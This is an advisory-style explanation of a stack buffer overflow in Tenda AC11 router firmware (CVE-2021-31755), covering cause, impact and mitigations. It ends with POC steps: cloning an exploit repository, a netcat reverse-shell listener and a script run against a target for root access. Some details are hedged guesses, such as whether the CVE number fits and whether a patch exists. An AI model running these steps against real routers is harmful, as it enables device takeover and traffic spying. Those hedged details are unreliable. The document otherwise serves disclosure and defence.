The issue is a stack buffer overflow vulnerability discovered in Tenda AC11 routers, with firmware versions through 02.03.01.104_CN. This type of vulnerability, if exploited, allows attackers to execute arbitrary code on the affected device. Here’s a breakdown of this CVE based on the description:
Vulnerability Overview
- CVE Identifier: CVE-2021-31755 (or a related vulnerability if you’re referring to a Tenda-specific issue)
- Vulnerability Type: Stack Buffer Overflow
- Affected Device: Tenda AC11 Router
- Firmware Affected: Through version 02.03.01.104_CN
- Attack Vector: A crafted POST request to the
/goform/setmacendpoint
Description
This vulnerability exists due to improper handling of user input in the /goform/setmac endpoint of the Tenda AC11 firmware. Specifically, there is a stack buffer overflow, which occurs when an attacker sends an excessively large payload to this endpoint in a POST request. Since the application does not properly validate or limit the size of the input, it overwrites critical memory areas in the stack.
When this happens, an attacker can manipulate the memory in such a way that they gain control of the instruction pointer, which allows them to execute arbitrary code on the device. The impact of such code execution can range from complete takeover of the router, changing its settings, spying on traffic, or even launching further attacks on devices connected to the network.
Exploit Details
- Attack Method: The attacker sends a specially crafted POST request to the vulnerable
/goform/setmacendpoint. - Required Access: The attacker would need network access to the router to exploit this vulnerability.
- Potential Impact: Code execution, system control, and further network compromise.
Mitigation
To mitigate this vulnerability:
- Update Firmware: Tenda has likely released a patch to address this vulnerability in a newer version of the firmware. Users should check for updates and install the latest firmware.
- Restrict Access: If an update is not available or cannot be applied immediately, restrict access to the router’s management interface from untrusted networks.
- Use Network-Level Protections: Employ firewalls and network segmentation to limit exposure of the vulnerable router to the broader internet.
POC
Clone repo:
git clone https://codeberg.org/bluef1sher/poc-cve-2021-31755.git
Run reverse shell listener
nc -lvp local_port
Execute poc.sh:
bash poc.sh remote_url local_ip local_port
- remote_url is vulnerable url
- local_ip is an attacker machine IP
- local_port is an attacker machine port
If the exploit succeeds, root access should be granted.